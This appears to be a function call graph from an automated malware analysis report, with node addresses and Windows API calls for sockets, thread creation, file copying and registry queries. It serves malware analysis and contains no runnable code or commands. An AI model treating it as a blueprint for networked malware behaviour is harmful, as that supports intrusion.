61287->61288 61289 2db833a 89 API calls 61288->61289 61290 2db516c 61289->61290 61291 2dba724 73 API calls 61290->61291 61292 2db5322 shared_ptr 61290->61292 61293 2db519d 61291->61293 61292->61256 61293->61292 61294 2db51f6 61293->61294 61295 2db51c4 61293->61295 61297 2dba724 73 API calls 61294->61297 61296 2dba724 73 API calls 61295->61296 61299 2db51d4 61296->61299 61298 2db5207 61297->61298 61298->61292 61300 2dba724 73 API calls 61298->61300 61299->61292 61302 2dba724 73 API calls 61299->61302 61301 2db524a 61300->61301 61301->61292 61304 2dba724 73 API calls 61301->61304 61303 2db52b4 61302->61303 61303->61292 61305 2dba724 73 API calls 61303->61305 61304->61299 61306 2db52da 61305->61306 61306->61292 61307 2dba724 73 API calls 61306->61307 61308 2db5304 61307->61308 61405 2dbced8 61308->61405 61311 2dbac18 __EH_prolog 61310->61311 61429 2dbd0ed 72 API calls 61311->61429 61313 2dbac39 shared_ptr 61430 2dc20f0 61313->61430 61315 2dbac50 61316 2db76d4 61315->61316 61436 2db3fb0 68 API calls Mailbox 61315->61436 61316->61259 61316->61260 61318 2dbac5c 61437 2dba68a 60 API calls 4 library calls 61318->61437 61321 2dc2fac _malloc 59 API calls 61320->61321 61322 2db6208 61321->61322 61324 2dc2449 61323->61324 61325 2dc2434 61323->61325 61324->61325 61329 2dc2450 61324->61329 61672 2dc5e5b 59 API calls __getptd_noexit 61325->61672 61327 2dc2439 61673 2dc4ef5 9 API calls __beginthreadex 61327->61673 61330 2db7827 61329->61330 61674 2dc5f01 79 API calls 7 library calls 61329->61674 61332 2db1ba7 61330->61332 61675 2dd53f0 61332->61675 61334 2db1bb1 RtlEnterCriticalSection 61335 2db1be9 RtlLeaveCriticalSection 61334->61335 61337 2db1bd1 61334->61337 61676 2dbe32f 61335->61676 61337->61335 61338 2db1c55 RtlLeaveCriticalSection 61337->61338 61338->61209 61339 2db1c22 61339->61338 61342 2dc0b10 Mailbox 68 API calls 61341->61342 61343 2db3c7e 61342->61343 61739 2db3ca2 61343->61739 61348 2db3d7e 61349 2db3dcb htons 61348->61349 61350 2db3d99 htons 61348->61350 61769 2db3c16 60 API calls 2 library calls 61349->61769 61768 2db3bd3 60 API calls 2 library calls 61350->61768 61353 2db3db7 htonl htonl 61354 2db3ded 61353->61354 61355 2db833a 61354->61355 61356 2db8373 61355->61356 61357 2db8352 61355->61357 61360 2db796c 61356->61360 61773 2db2ac7 61356->61773 61770 2db95fc 61357->61770 61360->61229 61361 2dba724 61360->61361 61362 2dc0b10 Mailbox 68 API calls 61361->61362 61363 2dba73e 61362->61363 61364 2db79b8 61363->61364 61844 2db2db5 61363->61844 61364->61235 61364->61244 61367 2dc0b10 Mailbox 68 API calls 61366->61367 61368 2dbd12c 61367->61368 61369 2dbd21a 61368->61369 61370 2db2db5 73 API calls 61368->61370 61369->61235 61370->61368 61372 2db8404 WSASetLastError shutdown 61371->61372 61373 2db83f4 61371->61373 61375 2dba508 69 API calls 61372->61375 61374 2dc0b10 Mailbox 68 API calls 61373->61374 61376 2db7ac7 61374->61376 61377 2db8421 61375->61377 61379 2db33b2 61376->61379 61377->61376 61378 2dc0b10 Mailbox 68 API calls 61377->61378 61378->61376 61380 2db33e1 61379->61380 61381 2db33c4 InterlockedCompareExchange 61379->61381 61383 2db29ee 76 API calls 61380->61383 61381->61380 61382 2db33d6 61381->61382 61868 2db32ab 78 API calls 2 library calls 61382->61868 61385 2db33f1 61383->61385 61385->61229 61386->61246 61387->61246 61388->61246 61389->61245 61390->61262 61391->61263 61392->61170 61393->61216 61394->61274 61395->61276 61396->61272 61398 2dbe009 __EH_prolog 61397->61398 61399 2dc3b4c _Allocate 60 API calls 61398->61399 61400 2dbe020 61399->61400 61400->61280 61402 2dc0b39 61401->61402 61403 2db513d 61401->61403 61404 2dc33a4 __cinit 68 API calls 61402->61404 61403->61285 61404->61403 61406 2dc0b10 Mailbox 68 API calls 61405->61406 61408 2dbcef2 61406->61408 61407 2dbd001 61407->61292 61408->61407 61410 2db2b95 61408->61410 61411 2db2bb1 61410->61411 61412 2db2bc7 61410->61412 61413 2dc0b10 Mailbox 68 API calls 61411->61413 61415 2db2bd2 61412->61415 61424 2db2bdf 61412->61424 61414 2db2bb6 61413->61414 61414->61408 61417 2dc0b10 Mailbox 68 API calls 61415->61417 61416 2db2be2 WSASetLastError WSARecv 61425 2dba508 61416->61425 61417->61414 61419 2db2d22 61428 2db1996 68 API calls __cinit 61419->61428 61421 2db2cbc WSASetLastError select 61422 2dba508 69 API calls 61421->61422 61422->61424 61423 2dc0b10 68 API calls Mailbox 61423->61424 61424->61414 61424->61416 61424->61419 61424->61421 61424->61423 61426 2dc0b10 Mailbox 68 API calls 61425->61426 61427 2dba514 WSAGetLastError 61426->61427 61427->61424 61428->61414 61429->61313 61438 2dc33b9 61430->61438 61433 2dc2114 61433->61315 61434 2dc213d ResumeThread 61434->61315 61435 2dc2136 CloseHandle 61435->61434 61436->61318 61439 2dc33db 61438->61439 61440 2dc33c7 61438->61440 61442 2dc8a6d __calloc_crt 59 API calls 61439->61442 61462 2dc5e5b 59 API calls __getptd_noexit 61440->61462 61444 2dc33e8 61442->61444 61443 2dc33cc 61463 2dc4ef5 9 API calls __beginthreadex 61443->61463 61446 2dc3439 61444->61446 61457 2dc5c5a 61444->61457 61447 2dc2f74 _free 59 API calls 61446->61447 61449 2dc343f 61447->61449 61451 2dc210b 61449->61451 61464 2dc5e3a 59 API calls 3 library calls 61449->61464 61451->61433 61451->61434 61451->61435 61452 2dc5ce1 __initptd 59 API calls 61454 2dc33fe CreateThread 61452->61454 61454->61451 61456 2dc3431 GetLastError 61454->61456 61481 2dc3519 61454->61481 61456->61446 61465 2dc5c72 GetLastError 61457->61465 61459 2dc5c60 61460 2dc33f5 61459->61460 61479 2dc8440 59 API calls 3 library calls 61459->61479 61460->61452 61462->61443 61463->61451 61464->61451 61466 2dc91cb __getptd_noexit TlsGetValue 61465->61466 61467 2dc5c87 61466->61467 61468 2dc5cd5 SetLastError 61467->61468 61469 2dc8a6d __calloc_crt 56 API calls 61467->61469 61468->61459 61470 2dc5c9a 61469->61470 61470->61468 61480 2dc91ea TlsSetValue 61470->61480 61472 2dc5cae 61473 2dc5ccc 61472->61473 61474 2dc5cb4 61472->61474 61476 2dc2f74 _free 56 API calls 61473->61476 61475 2dc5ce1 __initptd 56 API calls 61474->61475 61477 2dc5cbc GetCurrentThreadId 61475->61477 61478 2dc5cd2 61476->61478 61477->61468 61478->61468 61480->61472 61482 2dc3522 __threadstartex@4 61481->61482 61483 2dc91cb __getptd_noexit TlsGetValue 61482->61483 61484 2dc3528 61483->61484 61485 2dc352f __threadstartex@4 61484->61485 61486 2dc355b 61484->61486 61513 2dc91ea TlsSetValue 61485->61513 61514 2dc5aef 59 API calls 6 library calls 61486->61514 61489 2dc353e 61491 2dc3544 GetLastError RtlExitUserThread 61489->61491 61492 2dc3551 GetCurrentThreadId 61489->61492 61490 2dc3576 ___crtIsPackagedApp 61493 2dc358a 61490->61493 61497 2dc34c1 61490->61497 61491->61492 61492->61490 61503 2dc3452 61493->61503 61498 2dc34ca LoadLibraryExW GetProcAddress 61497->61498 61499 2dc3503 RtlDecodePointer 61497->61499 61500 2dc34ec 61498->61500 61501 2dc34ed RtlEncodePointer 61498->61501 61502 2dc3513 61499->61502 61500->61493 61501->61499 61502->61493 61504 2dc345e __fsopen 61503->61504 61505 2dc5c5a __beginthreadex 59 API calls 61504->61505 61506 2dc3463 61505->61506 61515 2dc2160 61506->61515 61509 2dc3473 61510 2dc8d94 __XcptFilter 59 API calls 61509->61510 61511 2dc3484 61510->61511 61513->61489 61514->61490 61533 2dc1610 61515->61533 61518 2dc21a8 TlsSetValue 61519 2dc21b0 61518->61519 61555 2dbddb3 61519->61555 61524 2dc3493 61525 2dc5c72 __getptd_noexit 59 API calls 61524->61525 61527 2dc349c 61525->61527 61526 2dc34b7 RtlExitUserThread 61527->61526 61528 2dc34ab 61527->61528 61529 2dc34b0 61527->61529 61670 2dc3596 LoadLibraryExW GetProcAddress RtlEncodePointer RtlDecodePointer 61528->61670 61671 2dc5c24 59 API calls 2 library calls 61529->61671 61532 2dc34b6 61532->61526 61551 2dc1674 61533->61551 61534 2dc16f0 61535 2dc1706 61534->61535 61537 2dc1703 CloseHandle 61534->61537 61571 2dc454b 61535->61571 61536 2dc16ce ResetEvent 61543 2dc16d5 61536->61543 61537->61535 61539 2dc179c WaitForSingleObject 61539->61551 61540 2dc168c 61540->61536 61541 2dc16a5 OpenEventA 61540->61541 61578 2dc1c10 GetCurrentProcessId 61540->61578 61545 2dc16bf 61541->61545 61546 2dc16c7 61541->61546 61542 2dc171e 61542->61518 61542->61519 61579 2dc1850 CreateEventA CloseHandle SetEvent GetCurrentProcessId 61543->61579 61545->61546 61548 2dc16c4 CloseHandle 61545->61548 61546->61536 61546->61543 61547 2dc16a2 61547->61541 61548->61546 61549 2dc1770 CreateEventA 61549->61551 61551->61534 61551->61539 61551->61540 61551->61549 61553 2dc178e CloseHandle 61551->61553 61580 2dc1c10 GetCurrentProcessId 61551->61580 61553->61551 61554 2dc16ed 61554->61534 61556 2dbddd5 61555->61556 61582 2db4d86 61556->61582 61557 2dbddd8 61559 2dc1f30 61557->61559 61560 2dc1f69 TlsGetValue 61559->61560 61570 2dc1f61 Mailbox 61559->61570 61560->61570 61561 2dc1fdd 61562 2dc2006 61561->61562 61564 2dc1ffe GetProcessHeap HeapFree 61561->61564 61562->61524 61563 2dc1fb9 61565 2dc1610 17 API calls 61563->61565 61564->61562 61567 2dc1fc8 61565->61567 61566 2dc2049 GetProcessHeap HeapFree 61566->61570 61567->61561 61568 2dc1fd5 TlsSetValue 61567->61568 61568->61561 61569 2dc203b GetProcessHeap HeapFree 61569->61566 61570->61561 61570->61563 61570->61566 61570->61569 61572 2dc4555 IsProcessorFeaturePresent 61571->61572 61573 2dc4553 61571->61573 61575 2dc958f 61572->61575 61573->61542 61581 2dc953e 5 API calls ___raise_securityfailure 61575->61581 61577 2dc9672 61577->61542 61578->61547 61579->61554 61580->61551 61581->61577 61583 2db4d90 __EH_prolog 61582->61583 61584 2dc0b10 Mailbox 68 API calls 61583->61584 61585 2db4da6 RtlEnterCriticalSection RtlLeaveCriticalSection 61584->61585 61586 2db50d4 shared_ptr 61585->61586 61595 2db4dd1 std::bad_exception::bad_exception 61585->61595 61586->61557 61588 2db50a1 RtlEnterCriticalSection RtlLeaveCriticalSection 61589 2db50b3 RtlEnterCriticalSection RtlLeaveCriticalSection 61588->61589 61589->61586 61589->61595 61590 2dba724 73 API calls 61590->61595 61592 2db4e8d RtlEnterCriticalSection RtlLeaveCriticalSection 61593 2db4e9f RtlEnterCriticalSection RtlLeaveCriticalSection 61592->61593 61593->61595 61594 2dbced8 73 API calls 61594->61595 61595->61588 61595->61589 61595->61590 61595->61592 61595->61593 61595->61594 61602 2db4bed 61595->61602 61626 2db7d23 60 API calls 61595->61626 61627 2dbd00a 60 API calls 2 library calls 61595->61627 61628 2db7cfd 60 API calls std::bad_exception::bad_exception 61595->61628 61629 2dba9b1 60 API calls 2 library calls 61595->61629 61630 2dbaa89 210 API calls 3 library calls 61595->61630 61631 2dc18f0 GetProcessHeap HeapFree 61595->61631 61632 2db4100 GetProcessHeap HeapFree 61595->61632 61603 2db4bf7 __EH_prolog 61602->61603 61604 2db1ba7 209 API calls 61603->61604 61605 2db4c31 61604->61605 61633 2db3a94 61605->61633 61607 2db4c3c 61608 2db3a94 60 API calls 61607->61608 61609 2db4c56 61608->61609 61636 2db85d1 61609->61636 61614 2dc0b10 Mailbox 68 API calls 61615 2db4cb8 61614->61615 61661 2dbc28f 61615->61661 61617 2db4ce1 InterlockedExchange 61665 2db2995 95 API calls Mailbox 61617->61665 61621 2db4d06 61625 2db4d3c 61621->61625 61666 2db858d 76 API calls Mailbox 61621->61666 61667 2db82f7 82 API calls Mailbox 61621->61667 61668 2db2995 95 API calls Mailbox 61621->61668 61622 2db4d57 shared_ptr 61622->61595 61669 2db861a 75 API calls 2 library calls 61625->61669 61626->61595 61627->61595 61628->61595 61629->61595 61630->61595 61631->61595 61632->61595 61634 2db39ee 60 API calls 61633->61634 61635 2db3ab5 61634->61635 61635->61607 61637 2dc0b10 Mailbox 68 API calls 61636->61637 61638 2db85e7 61637->61638 61639 2db9a20 77 API calls 61638->61639 61640 2db8601 61639->61640 61641 2db1712 60 API calls 61640->61641 61642 2db4c8b 61641->61642 61643 2dbe0f7 61642->61643 61644 2dbe101 __EH_prolog 61643->61644 61645 2db1a01 61 API calls 61644->61645 61646 2dbe118 61645->61646 61647 2dbe155 InterlockedExchangeAdd 61646->61647 61648 2dc0b10 Mailbox 68 API calls 61646->61648 61650 2dbe190 RtlEnterCriticalSection 61647->61650 61651 2dbe185 61647->61651 61648->61647 61652 2db7f5a 60 API calls 61650->61652 61653 2db1ec7 InterlockedIncrement PostQueuedCompletionStatus RtlEnterCriticalSection InterlockedExchange RtlLeaveCriticalSection 61651->61653 61655 2dbe1b6 InterlockedIncrement 61652->61655 61654 2dbe18e 61653->61654 61659 2dbe851 TlsGetValue 61654->61659 61656 2dbe1cd RtlLeaveCriticalSection 61655->61656 61657 2dbe1c6 61655->61657 61656->61654 61658 2db27f3 SetWaitableTimer 61657->61658 61658->61656 61660 2db4ca4 61659->61660 61660->61614 61663 2dbc2a2 61661->61663 61662 2dbc2cb 61662->61617 61663->61662 61664 2dbe9c0 83 API calls 61663->61664 61664->61662 61665->61621 61666->61621 61667->61621 61668->61621 61669->61622 61670->61529 61671->61532 61672->61327 61673->61330 61674->61330 61675->61334 61677 2dbe339 __EH_prolog 61676->61677 61678 2dc3b4c _Allocate 60 API calls 61677->61678 61679 2dbe342 61678->61679 61680 2db1bfa RtlEnterCriticalSection 61679->61680 61682 2dbe550 61679->61682 61680->61339 61683 2dbe55a __EH_prolog 61682->61683 61686 2db26db RtlEnterCriticalSection 61683->61686 61685 2dbe5b0 61685->61680 61687 2db2728 CreateWaitableTimerA 61686->61687 61688 2db277e 61686->61688 61690 2db275b SetWaitableTimer 61687->61690 61691 2db2738 GetLastError 61687->61691 61689 2db27d5 RtlLeaveCriticalSection 61688->61689 61692 2dc3b4c _Allocate 60 API calls 61688->61692 61689->61685 61690->61688 61693 2dc0b10 Mailbox 68 API calls 61691->61693 61694 2db278a 61692->61694 61695 2db2745 61693->61695 61696 2db27c8 61694->61696 61698 2dc3b4c _Allocate 60 API calls 61694->61698 61730 2db1712 61695->61730 61736 2db7e02 CloseHandle 61696->61736 61699 2db27a9 61698->61699 61702 2db1cf8 CreateEventA 61699->61702 61703 2db1d23 GetLastError 61702->61703 61704 2db1d52 CreateEventA 61702->61704 61707 2db1d33 61703->61707 61705 2db1d6b GetLastError 61704->61705 61722 2db1d96 61704->61722 61710 2db1d7b 61705->61710 61706 2dc33b9 __beginthreadex 201 API calls 61708 2db1db6 61706->61708 61709 2dc0b10 Mailbox 68 API calls 61707->61709 61711 2db1e0d 61708->61711 61712 2db1dc6 GetLastError 61708->61712 61713 2db1d3c 61709->61713 61714 2dc0b10 Mailbox 68 API calls 61710->61714 61715 2db1e1d 61711->61715 61716 2db1e11 WaitForSingleObject CloseHandle 61711->61716 61720 2db1dd8 61712->61720 61717 2db1712 60 API calls 61713->61717 61718 2db1d84 61714->61718 61715->61696 61716->61715 61721 2db1d4e 61717->61721 61719 2db1712 60 API calls 61718->61719 61719->61722 61723 2db1ddf 61720->61723 61724 2db1ddc CloseHandle 61720->61724 61721->61704 61722->61706 61725 2db1de9 CloseHandle 61723->61725 61726 2db1dee 61723->61726 61724->61723 61725->61726 61727 2dc0b10 Mailbox 68 API calls 61726->61727 61728 2db1dfb 61727->61728 61729 2db1712 60 API calls 61728->61729 61729->61711 61731 2db171c __EH_prolog 61730->61731 61732 2db173e 61731->61732 61737 2db1815 59 API calls std::exception::exception 61731->61737 61732->61690 61734 2db1732 61738 2dba4a1 60 API calls 2 library calls 61734->61738 61736->61689 61737->61734 61750 2db30ae WSASetLastError 61739->61750 61742 2db30ae 71 API calls 61743 2db3c90 61742->61743 61744 2db16ae 61743->61744 61745 2db16b8 __EH_prolog 61744->61745 61746 2db1701 61745->61746 61766 2dc24d3 59 API calls std::exception::_Copy_str 61745->61766 61746->61348 61748 2db16dc 61767 2dba4a1 60 API calls 2 library calls 61748->61767 61751 2db30ce 61750->61751 61752 2db30ec WSAStringToAddressA 61750->61752 61751->61752 61753 2db30d3 61751->61753 61754 2dba508 69 API calls 61752->61754 61755 2dc0b10 Mailbox 68 API calls 61753->61755 61756 2db3114 61754->61756 61757 2db30d8 61755->61757 61758 2db3154 61756->61758 61760 2db311e _memcmp 61756->61760 61757->61742 61757->61743 61761 2dc0b10 Mailbox 68 API calls 61758->61761 61764 2db3135 61758->61764 61759 2db3193 61759->61757 61765 2dc0b10 Mailbox 68 API calls 61759->61765 61763 2dc0b10 Mailbox 68 API calls 61760->61763 61760->61764 61761->61764 61762 2dc0b10 Mailbox 68 API calls 61762->61759 61763->61764 61764->61759 61764->61762 61765->61757 61766->61748 61768->61353 61769->61354 61791 2db353e 61770->61791 61774 2db2ae8 WSASetLastError connect 61773->61774 61775 2db2ad8 61773->61775 61777 2dba508 69 API calls 61774->61777 61776 2dc0b10 Mailbox 68 API calls 61775->61776 61778 2db2add 61776->61778 61779 2db2b07 61777->61779 61781 2dc0b10 Mailbox 68 API calls 61778->61781 61779->61778 61780 2dc0b10 Mailbox 68 API calls 61779->61780 61780->61778 61782 2db2b1b 61781->61782 61783 2db2b38 61782->61783 61784 2dc0b10 Mailbox 68 API calls 61782->61784 61787 2db2b87 61783->61787 61842 2db3027 71 API calls Mailbox 61783->61842 61784->61783 61786 2db2b59 61786->61787 61843 2db2fb4 71 API calls Mailbox 61786->61843 61787->61360 61789 2db2b7a 61789->61787 61790 2dc0b10 Mailbox 68 API calls 61789->61790 61790->61787 61792 2db3548 __EH_prolog 61791->61792 61793 2db3557 61792->61793 61794 2db3576 61792->61794 61821 2db1996 68 API calls __cinit 61793->61821 61813 2db2edd WSASetLastError WSASocketA 61794->61813 61798 2db35ad CreateIoCompletionPort 61799 2db35db 61798->61799 61800 2db35c5 GetLastError 61798->61800 61801 2dc0b10 Mailbox 68 API calls 61799->61801 61802 2dc0b10 Mailbox 68 API calls 61800->61802 61803 2db35d2 61801->61803 61802->61803 61804 2db35ef 61803->61804 61805 2db3626 61803->61805 61806 2dc0b10 Mailbox 68 API calls 61804->61806 61840 2dbdef2 60 API calls 2 library calls 61805->61840 61807 2db3608 61806->61807 61822 2db29ee 61807->61822 61810 2db3659 61811 2dc0b10 Mailbox 68 API calls 61810->61811 61812 2db355f 61811->61812 61812->61356 61814 2dc0b10 Mailbox 68 API calls 61813->61814 61815 2db2f0a WSAGetLastError 61814->61815 61816 2db2f21 61815->61816 61820 2db2f41 61815->61820 61817 2db2f3c 61816->61817 61818 2db2f27 setsockopt 61816->61818 61819 2dc0b10 Mailbox 68 API calls 61817->61819 61818->61817 61819->61820 61820->61798 61820->61812 61821->61812 61823 2db2a0c 61822->61823 61839 2db2aad 61822->61839 61825 2db2a39 WSASetLastError closesocket 61823->61825 61829 2dc0b10 Mailbox 68 API calls 61823->61829 61824 2dc0b10 Mailbox 68 API calls 61826 2db2ab8 61824->61826 61827 2dba508 69 API calls 61825->61827 61826->61812 61828 2db2a51 61827->61828 61831 2dc0b10 Mailbox 68 API calls 61828->61831 61828->61839 61830 2db2a21 61829->61830 61841 2db2f50 71 API calls Mailbox 61830->61841 61833 2db2a5c 61831->61833 61835 2db2a7b ioctlsocket WSASetLastError closesocket 61833->61835 61836 2dc0b10 Mailbox 68 API calls 61833->61836 61834 2db2a36 61834->61825 61837 2dba508 69 API calls 61835->61837 61838 2db2a6e 61836->61838 61837->61839 61838->61835 61838->61839 61839->61824 61839->61826 61840->61810 61841->61834 61842->61786 61843->61789 61845 2db2dca 61844->61845 61846 2db2de4 61844->61846 61847 2dc0b10 Mailbox 68 API calls 61845->61847 61848 2db2dfc 61846->61848 61850 2db2def 61846->61850 61852 2db2dcf 61847->61852 61858 2db2d39 WSASetLastError WSASend 61848->61858 61851 2dc0b10 Mailbox 68 API calls 61850->61851 61851->61852 61852->61363 61853 2dc0b10 68 API calls Mailbox 61856 2db2e0c 61853->61856 61854 2db2e54 WSASetLastError select 61855 2dba508 69 API calls 61854->61855 61855->61856 61856->61852 61856->61853 61856->61854 61857 2db2d39 71 API calls 61856->61857 61857->61856 61859 2dba508 69 API calls 61858->61859 61860 2db2d6e 61859->61860 61861 2db2d82 61860->61861 61862 2db2d75 61860->61862 61864 2db2d7a 61861->61864 61865 2dc0b10 Mailbox 68 API calls 61861->61865 61863 2dc0b10 Mailbox 68 API calls 61862->61863 61863->61864 61866 2db2d9c 61864->61866 61867 2dc0b10 Mailbox 68 API calls 61864->61867 61865->61864 61866->61856 61867->61866 61868->61380 60806 402611 CopyFileA 61869 40d572 RegQueryValueExA 61870 40d580 61869->61870 61871 402c65 RegCloseKey 61869->61871 61873 40d6f2 LoadLibraryExA 60807 2dc3d0f 60808 2dc3d1d 60807->60808 60809 2dc3d18 60807->60809 60813 2dc3d32 60808->60813 60821 2dcb8e1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 60809->60821 60812 2dc3d2b 60814 2dc3d3e __fsopen 60813->60814 60818 2dc3d8c ___DllMainCRTStartup 60814->60818 60820 2dc3de9 __fsopen 60814->60820 60822 2dc3b9d 60814->60822 60816 2dc3dc6 60817 2dc3b9d __CRT_INIT@12 138 API calls 60816->60817 60816->60820 60817->60820 60818->60816 60819 2dc3b9d __CRT_INIT@12 138 API calls 60818->60819 60818->60820 60819->60816 60820->60812 60821->60808 60823 2dc3ba9 __fsopen 60822->60823 60824 2dc3c2b 60823->60824 60825 2dc3bb1 60823->60825 60827 2dc3c2f 60824->60827 60828 2dc3c94 60824->60828 60870 2dc81e7 GetProcessHeap 60825->60870 60832 2dc3c50 60827->60832 60860 2dc3bba __fsopen __CRT_INIT@12 60827->60860 60959 2dc845c 59 API calls _doexit 60827->60959 60830 2dc3c99 60828->60830 60831 2dc3cf7 60828->60831 60829 2dc3bb6 60829->60860 60871 2dc5d94 60829->60871 60964 2dc91cb 60830->60964 60831->60860 60990 2dc5c24 59 API calls 2 library calls 60831->60990 60960 2dc8333 61 API calls _free 60832->60960 60837 2dc3ca4 60837->60860 60967 2dc8a6d 60837->60967 60839 2dc3bc6 __RTC_Initialize 60847 2dc3bd6 GetCommandLineA 60839->60847 60839->60860 60841 2dc3c55 60842 2dc3c66 __CRT_INIT@12 60841->60842 60961 2dcb57f 60 API calls _free 60841->60961 60963 2dc3c7f 62 API calls __mtterm 60842->60963 60846 2dc3c61 60962 2dc5e0a 62 API calls 2 library calls 60846->60962 60892 2dcb97d GetEnvironmentStringsW 60847->60892 60851 2dc3ccd 60854 2dc3ceb 60851->60854 60855 2dc3cd3 60851->60855 60984 2dc2f74 60854->60984 60974 2dc5ce1 60855->60974 60856 2dc3bf0 60859 2dc3bf4 60856->60859 60924 2dcb5d1 60856->60924 60957 2dc5e0a 62 API calls 2 library calls 60859->60957 60860->60818 60861 2dc3cdb GetCurrentThreadId 60861->60860 60865 2dc3c14 60865->60860 60958 2dcb57f 60 API calls _free 60865->60958 60870->60829 60991 2dc8503 36 API calls 2 library calls 60871->60991 60873 2dc5d99 60992 2dc8a1f InitializeCriticalSectionAndSpinCount __getstream 60873->60992 60875 2dc5d9e 60876 2dc5da2 60875->60876 60994 2dc918e TlsAlloc 60875->60994 60993 2dc5e0a 62 API calls 2 library calls 60876->60993 60879 2dc5da7 60879->60839 60880 2dc5db4 60880->60876 60881 2dc5dbf 60880->60881 60882 2dc8a6d __calloc_crt 59 API calls 60881->60882 60883 2dc5dcc 60882->60883 60884 2dc5e01 60883->60884 60995 2dc91ea TlsSetValue 60883->60995 60996 2dc5e0a 62 API calls 2 library calls 60884->60996 60887 2dc5e06 60887->60839 60888 2dc5de0 60888->60884 60889 2dc5de6 60888->60889 60890 2dc5ce1 __initptd 59 API calls 60889->60890 60891 2dc5dee GetCurrentThreadId 60890->60891 60891->60839 60893 2dc3be6 60892->60893 60894 2dcb990 WideCharToMultiByte 60892->60894 60905 2dcb2cb 60893->60905 60896 2dcb9fa FreeEnvironmentStringsW 60894->60896 60897 2dcb9c3 60894->60897 60896->60893 60997 2dc8ab5 59 API calls 2 library calls 60897->60997 60899 2dcb9c9 60899->60896 60900 2dcb9d0 WideCharToMultiByte 60899->60900 60901 2dcb9ef FreeEnvironmentStringsW 60900->60901 60902 2dcb9e6 60900->60902 60901->60893 60903 2dc2f74 _free 59 API calls 60902->60903 60904 2dcb9ec 60903->60904 60904->60901 60906 2dcb2d7 __fsopen 60905->60906 60998 2dc88ee 60906->60998 60908 2dcb2de 60909 2dc8a6d __calloc_crt 59 API calls 60908->60909 60910 2dcb2ef 60909->60910 60911 2dcb35a GetStartupInfoW 60910->60911 60913 2dcb2fa __fsopen @_EH4_CallFilterFunc@8 60910->60913 60912 2dcb36f 60911->60912 60916 2dcb49e 60911->60916 60912->60916 60917 2dc8a6d __calloc_crt 59 API calls 60912->60917 60920 2dcb3bd 60912->60920 60913->60856 60914 2dcb566 61007 2dcb576 RtlLeaveCriticalSection _doexit 60914->61007 60916->60914 60918 2dcb4eb GetStdHandle 60916->60918 60919 2dcb4fe GetFileType 60916->60919 61006 2dc920c InitializeCriticalSectionAndSpinCount 60916->61006 60917->60912 60918->60916 60919->60916 60920->60916 60921 2dcb3f1 GetFileType 60920->60921 61005 2dc920c InitializeCriticalSectionAndSpinCount 60920->61005 60921->60920 60925 2dcb5df 60924->60925 60926 2dcb5e4 GetModuleFileNameA 60924->60926 61016 2dc528a 71 API calls __setmbcp 60925->61016 60928 2dcb611 60926->60928 61010 2dcb684 60928->61010 60930 2dc3c00 60930->60865 60935 2dcb800 60930->60935 60933 2dcb64a 60933->60930 60934 2dcb684 _parse_cmdline 59 API calls 60933->60934 60934->60930 60936 2dcb809 60935->60936 60938 2dcb80e _strlen 60935->60938 61020 2dc528a 71 API calls __setmbcp 60936->61020 60939 2dc8a6d __calloc_crt 59 API calls 60938->60939 60942 2dc3c09 60938->60942 60947 2dcb844 _strlen 60939->60947 60940 2dcb896 60941 2dc2f74 _free 59 API calls 60940->60941 60941->60942 60942->60865 60951 2dc846b 60942->60951 60943 2dc8a6d __calloc_crt 59 API calls 60943->60947 60944 2dcb8bd 60945 2dc2f74 _free 59 API calls 60944->60945 60945->60942 60947->60940 60947->60942 60947->60943 60947->60944 60948 2dcb8d4 60947->60948 61021 2dc6cbc 59 API calls __beginthreadex 60947->61021 61022 2dc4f05 8 API calls 2 library calls 60948->61022 60950 2dcb8e0 60954 2dc8477 __IsNonwritableInCurrentImage 60951->60954 60953 2dc8495 __initterm_e 60956 2dc84b4 _doexit __IsNonwritableInCurrentImage 60953->60956 61026 2dc33a4 60953->61026 61023 2dcd2df 60954->61023 60956->60865 60957->60860 60958->60859 60959->60832 60960->60841 60961->60846 60962->60842 60963->60860 60965 2dc91de 60964->60965 60966 2dc91e2 TlsGetValue 60964->60966 60965->60837 60966->60837 60970 2dc8a74 60967->60970 60969 2dc3cb5 60969->60860 60973 2dc91ea TlsSetValue 60969->60973 60970->60969 60972 2dc8a92 60970->60972 61061 2dd04b8 60970->61061 60972->60969 60972->60970 61069 2dc9505 Sleep 60972->61069 60973->60851 60975 2dc5ced __fsopen 60974->60975 60976 2dc88ee __lock 59 API calls 60975->60976 60977 2dc5d2a 60976->60977 61072 2dc5d82 60977->61072 60980 2dc88ee __lock 59 API calls 60981 2dc5d4b ___addlocaleref 60980->60981 61075 2dc5d8b 60981->61075 60983 2dc5d76 __fsopen 60983->60861 60985 2dc2f7d HeapFree 60984->60985 60986 2dc2fa6 __dosmaperr 60984->60986 60985->60986 60987 2dc2f92 60985->60987 60986->60860 61080 2dc5e5b 59 API calls __getptd_noexit 60987->61080 60989 2dc2f98 GetLastError 60989->60986 60990->60860 60991->60873 60992->60875 60993->60879 60994->60880 60995->60888 60996->60887 60997->60899 60999 2dc88ff 60998->60999 61000 2dc8912 RtlEnterCriticalSection 60998->61000 61008 2dc8976 59 API calls 9 library calls 60999->61008 61000->60908 61002 2dc8905 61002->61000 61009 2dc8440 59 API calls 3 library calls 61002->61009 61005->60920 61006->60916 61007->60913 61008->61002 61012 2dcb6a6 61010->61012 61015 2dcb70a 61012->61015 61018 2dd15d6 59 API calls x_ismbbtype_l 61012->61018 61013 2dcb627 61013->60930 61017 2dc8ab5 59 API calls 2 library calls 61013->61017 61015->61013 61019 2dd15d6 59 API calls x_ismbbtype_l 61015->61019 61016->60926 61017->60933 61018->61012 61019->61015 61020->60938 61021->60947 61022->60950 61024 2dcd2e2 RtlEncodePointer 61023->61024 61024->61024 61025 2dcd2fc 61024->61025 61025->60953 61029 2dc32a8 61026->61029 61028 2dc33af 61028->60956 61030 2dc32b4 __fsopen 61029->61030 61037 2dc8593 61030->61037 61036 2dc32db __fsopen 61036->61028 61038 2dc88ee __lock 59 API calls 61037->61038 61039 2dc32bd 61038->61039 61040 2dc32ec RtlDecodePointer RtlDecodePointer 61039->61040 61041 2dc3319 61040->61041 61042 2dc32c9 61040->61042 61041->61042 61054 2dc915d 60 API calls __beginthreadex 61041->61054 61051 2dc32e6 61042->61051 61044 2dc337c RtlEncodePointer RtlEncodePointer 61044->61042 61045 2dc332b 61045->61044 61046 2dc3350 61045->61046 61055 2dc8afc 62 API calls 2 library calls 61045->61055 61046->61042 61050 2dc336a RtlEncodePointer 61046->61050 61056 2dc8afc 62 API calls 2 library calls 61046->61056 61049 2dc3364 61049->61042 61049->61050 61050->61044 